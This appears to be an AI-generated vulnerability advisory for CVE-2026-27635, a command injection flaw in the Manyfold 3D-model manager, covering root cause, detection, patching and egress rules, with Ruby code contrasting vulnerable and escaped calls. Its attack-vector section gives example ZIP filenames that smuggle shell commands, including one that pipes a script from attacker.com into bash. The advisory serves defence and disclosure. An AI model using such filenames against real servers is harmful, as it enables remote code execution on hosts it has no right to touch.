CVE-2026-27635 Overview
CVE-2026-27635 is a command injection vulnerability in Manyfold, an open source, self-hosted web application for managing collections of 3D models, particularly focused on 3D printing. Prior to version 0.133.0, when model render generation is enabled, a logged-in user can achieve remote code execution (RCE) by uploading a ZIP file containing a file with a shell metacharacter in its name. The filename reaches a Ruby backtick call unsanitized, allowing arbitrary command execution on the host system.
Critical Impact
Authenticated attackers can achieve full remote code execution on the Manyfold server by uploading a maliciously crafted ZIP file with shell metacharacters in filenames, potentially compromising the entire hosting environment.
Affected Products
- Manyfold versions prior to 0.133.0
- Self-hosted Manyfold deployments with model render generation enabled
Discovery Timeline
- February 26, 2026 - CVE-2026-27635 published to NVD
- February 26, 2026 - Last updated in NVD database
Technical Details for CVE-2026-27635
Vulnerability Analysis
This vulnerability is classified as CWE-78 (OS Command Injection), one of the most severe vulnerability classes due to its potential for complete system compromise. The flaw exists in how Manyfold processes uploaded ZIP archives when the model render generation feature is active.
When a user uploads a ZIP file containing 3D models, the application extracts the files and processes them for render generation. During this process, filenames from the uploaded archive are passed to a Ruby backtick (`) call without proper sanitization. Ruby backticks execute the enclosed string as a shell command, making unsanitized user input in this context extremely dangerous.
An attacker with valid authentication credentials can craft a ZIP archive containing files with specially crafted names that include shell metacharacters such as backticks, semicolons, pipes, or command substitution syntax. When the application processes these filenames, the embedded commands execute with the privileges of the Manyfold application process.
Root Cause
The root cause of this vulnerability is improper input validation and the unsafe use of shell command execution in Ruby. The application fails to sanitize or escape filenames extracted from user-uploaded ZIP archives before passing them to Ruby's backtick operator. This allows shell metacharacters embedded in filenames to be interpreted as command syntax rather than literal characters.
The secure approach would involve using Ruby's Shellwords.escape() method or avoiding shell execution entirely by using direct API calls for file operations.
Attack Vector
The attack requires network access and valid user authentication to the Manyfold application. The attacker must:
- Authenticate to the Manyfold instance
- Create a ZIP archive containing a file with shell metacharacters in the filename (e.g., `whoami`.stl or ; curl attacker.com/shell.sh | bash ;.stl)
- Upload the malicious ZIP file as a 3D model
- Wait for the model render generation process to trigger the command execution
Attack complexity is raised by the preconditions (a valid account and model render generation enabled), but once those hold, exploitation is straightforward and reliable.
For detailed technical information about the vulnerability mechanism, refer to the GitHub Security Advisory GHSA-p589-cf26-v7h2.
Detection Methods for CVE-2026-27635
Indicators of Compromise
- Presence of ZIP files with unusual filenames containing shell metacharacters (backticks, semicolons, pipes, $() patterns)
- Unexpected child processes spawned by the Manyfold application or Ruby interpreter
- Unusual network connections originating from the Manyfold server process
- System command execution logs showing commands run under the Manyfold service account context
Detection Strategies
- Monitor file upload activity for ZIP archives containing files with shell metacharacters in filenames
- Implement application-level logging to track all model uploads and render generation jobs
- Deploy endpoint detection to identify unexpected process execution chains from the Manyfold application
- Configure web application firewall rules to inspect uploaded archive contents for suspicious filename patterns
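As an added illustration of the Root Cause and Detection Strategies sections (this is not Manyfold's own code and does not mirror its render implementation): the backtick-style command construction that creates the CWE-78 condition, beside the Shellwords.escape and argv forms that close it, plus the filename check a detection job would run over a ZIP's entry list. The "render" tool name and the entry names are assumed or constructed.

```ruby
require "shellwords"
require "open3"

# Added example for the CVE-2026-27635 bug class (CWE-78); illustrative code,
# not Manyfold's. "render" is an assumed placeholder for the preview tool.

# VULNERABLE shape: the archive entry name is interpolated into one string
# that Ruby's backtick operator hands to /bin/sh, so `...`, $(...), ; and |
# inside the name are parsed as shell syntax. Returned here, not executed,
# so it can be inspected safely.
def vulnerable_command(entry_name)
  "render --input #{entry_name} --output preview.png" # would run as `#{...}`
end

# FIX (a): Shellwords.escape backslash-quotes every character outside the
# shell's safe set, so the name reaches the tool as one literal argument.
def escaped_command(entry_name)
  "render --input #{Shellwords.escape(entry_name)} --output preview.png"
end

# FIX (b): build argv and exec directly. Open3 / Kernel#spawn with more than
# one argument never involve a shell, so there is nothing to inject into.
def render_argv(entry_name)
  ["render", "--input", entry_name, "--output", "preview.png"]
end

# Shows the argv form treating the name literally: "echo" stands in for the
# render tool. Via a shell, `whoami` would have been substituted instead.
def echo_literally(entry_name)
  out, _status = Open3.capture2("echo", entry_name)
  out.chomp
end

# Detection side: flag archive entry names carrying the metacharacters a
# /bin/sh command line would interpret (the IoC list above).
SHELL_META = /[`$;|&<>\n]/

def suspicious_entries(entry_names)
  entry_names.grep(SHELL_META)
end

# Constructed entry list, standing in for a ZIP's central directory.
SAMPLE_ENTRIES = ["benchy.stl", "bracket v2.stl", "`whoami`.stl", "$(id).3mf"]

if __FILE__ == $PROGRAM_NAME
  puts vulnerable_command("`whoami`.stl")
  puts escaped_command("`whoami`.stl")
  p render_argv("`whoami`.stl")
  p suspicious_entries(SAMPLE_ENTRIES)
end
```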
Monitoring Recommendations
- Enable verbose logging for the Manyfold application and review logs for anomalous filename patterns
- Set up alerts for any shell command execution originating from the Manyfold process context
- Monitor network egress from the Manyfold server for signs of reverse shell connections or data exfiltration
- Implement file integrity monitoring on critical system directories
How to Mitigate CVE-2026-27635
Immediate Actions Required
- Upgrade Manyfold to version 0.133.0 or later immediately
- If immediate upgrade is not possible, disable the model render generation feature until patching is complete
- Review upload logs for any suspicious ZIP files with unusual filenames
- Audit system for signs of compromise if the vulnerable feature was enabled
Patch Information
The vulnerability has been fixed in Manyfold version 0.133.0. The patch addresses the unsafe handling of filenames by implementing proper input sanitization before passing values to shell commands. Users should upgrade to this version or later to remediate the vulnerability.
For patch details, see the Manyfold Release v0.133.0.
Workarounds
- Disable model render generation in Manyfold settings until the patch can be applied
- Restrict user registration and access to trusted users only
- Implement network segmentation to limit the blast radius if the Manyfold server is compromised
- Deploy a web application firewall to filter uploaded content containing suspicious patterns
# Disable model render generation (configuration may vary based on deployment)
# Review your Manyfold configuration and disable render generation features
# Consult documentation at: https://github.com/manyfold3d/manyfold
# Restrict network egress from the Manyfold container/server. A bare DROP on
# the service account's OUTPUT traffic would also block loopback and the
# replies to connections already in progress (including Manyfold's own HTTP
# responses), so permit those first, then add explicit ACCEPT rules for any
# remote database, object store or SMTP host the deployment needs.
iptables -A OUTPUT -m owner --uid-owner manyfold -o lo -j ACCEPT
iptables -A OUTPUT -m owner --uid-owner manyfold -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m owner --uid-owner manyfold -j DROP
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.